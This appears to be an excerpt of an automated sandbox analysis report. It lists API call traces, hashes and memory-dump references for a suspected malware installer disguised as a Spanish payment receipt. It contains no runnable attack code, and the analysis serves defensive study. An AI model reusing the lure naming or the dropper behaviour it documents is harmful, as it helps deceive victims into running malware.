                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                    • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                    • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                      • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                                      • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                      • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                                      • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
                                                                                                                                                                                      • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                                                                    • Opcode ID: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                                    • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004049A3
• SetWindowTextW.USER32(00000000,?), ref: 004049CD
• SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
• CoTaskMemFree.OLE32(00000000), ref: 00404A89
• lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
• lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
  • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
  • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
  • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
  • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
  • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
• GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
  • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
  • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
  • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
• API String ID: 2624150263-39638649
• Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
• Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
• Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
• Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
APIs
• CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
Strings
• C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes, xrefs: 00402269
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes
• API String ID: 542301482-2682595351
• Opcode ID: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
• Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
• Opcode Fuzzy Hash: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
• Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
• Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
• Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
• Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404EE8
• GetDlgItem.USER32(?,00000408), ref: 00404EF3
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
• SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
• SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
• DeleteObject.GDI32(00000000), ref: 00404FCA
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
• GetWindowLongW.USER32(?,000000F0), ref: 0040510E
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
• ShowWindow.USER32(?,00000005), ref: 0040512C
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
• ImageList_Destroy.COMCTL32(?), ref: 004052FA
• GlobalFree.KERNEL32(?), ref: 0040530A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
• SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
• ShowWindow.USER32(?,00000000), ref: 004054B4
• GetDlgItem.USER32(?,000003FE), ref: 004054BF
• ShowWindow.USER32(00000000), ref: 004054C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                                                                    • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                    • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
• GetDlgItem.USER32(?,000003E8), ref: 004046D4
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
• GetSysColor.USER32(?), ref: 00404702
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
• lstrlenW.KERNEL32(?), ref: 00404723
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
• GetDlgItem.USER32(?,0000040A), ref: 0040479E
• SendMessageW.USER32(00000000), ref: 004047A5
• GetDlgItem.USER32(?,000003E8), ref: 004047D0
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
• LoadCursorW.USER32(00000000,00007F02), ref: 00404821
• SetCursor.USER32(00000000), ref: 00404824
• LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
• SetCursor.USER32(00000000), ref: 00404840
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: : Completed$N
• API String ID: 3103080414-2140067464
• Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
• Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
• Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
• Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
• Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
• Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
• Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                                      • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                      • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                                      • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                      • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
• Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
• Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
• Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004044E7
• GetSysColor.USER32(00000000), ref: 00404525
• SetTextColor.GDI32(?,00000000), ref: 00404531
• SetBkMode.GDI32(?,?), ref: 0040453D
• GetSysColor.USER32(?), ref: 00404550
• SetBkColor.GDI32(?,?), ref: 00404560
• DeleteObject.GDI32(?), ref: 0040457A
• CreateBrushIndirect.GDI32(?), ref: 00404584
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
• Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 00402758
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
  • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
